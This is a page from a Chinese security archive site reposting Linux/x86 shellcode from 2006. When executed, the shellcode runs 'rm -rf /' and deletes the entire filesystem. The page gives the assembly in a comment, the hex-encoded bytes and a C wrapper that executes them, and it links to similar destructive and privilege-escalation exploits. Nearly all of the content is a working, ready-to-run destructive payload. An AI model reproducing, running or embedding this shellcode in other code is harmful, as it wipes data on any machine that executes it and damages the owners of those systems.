首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
linux/x86 execve(rm -rf /) shellcode 48 bytes
来源:vfocus.net 作者:Kris 发布时间:2006-11-20  

/* By Kris Katterjohn 8/31/2006
*
* 48 byte shellcode to execve("rm -rf /") for Linux/x86
*
*
*
* section .text
*
* global _start
*
* _start:
*
* ; execve("/bin/rm", { "/bin/rm", "-r", "-f", "/", NULL }, NULL)
*
* push byte 11
* pop eax
* xor esi, esi
* push esi
* push byte 0x2f
* mov edi, esp
* push esi
* push word 0x662d
* mov edx, esp
* push esi
* push word 0x722d
* mov ecx, esp
* push esi
* push 0x6d722f2f
* push 0x6e69622f
* mov ebx, esp
* push esi
* push edi
* push edx
* push ecx
* push ebx
* mov ecx, esp
* xor edx, edx
* int 0x80
*/

main()
{
char shellcode[] =
"\x6a\x0b\x58\x31\xf6\x56\x6a\x2f\x89\xe7\x56\x66\x68\x2d\x66"
"\x89\xe2\x56\x66\x68\x2d\x72\x89\xe1\x56\x68\x2f\x2f\x72\x6d"
"\x68\x2f\x62\x69\x6e\x89\xe3\x56\x57\x52\x51\x53\x89\xe1\x31"
"\xd2\xcd\x80";

(*(void (*)()) shellcode)();
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·UniversalFTP 1.0.50 (MKD) Remo
·linux/x86 forkbomb 7 bytes
·WinZIP <= 10.0.7245 (FileVi
·linux/x86 chmod 0666 /etc/shad
·Kerio WebSTAR 5.4.2 (libucache
·linux/x86 set system time to 0
·WinZIP <= 10.0.7245 (FileVi
·linux/x86 /sbin/ipchains -F 41
·Links 1.00pre12 (smbclient) Re
·MS Windows NetpManageIPCConnec
·CMSmelborp Beta (user_standard
·MS Windows Wkssvc NetrJoinDoma
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved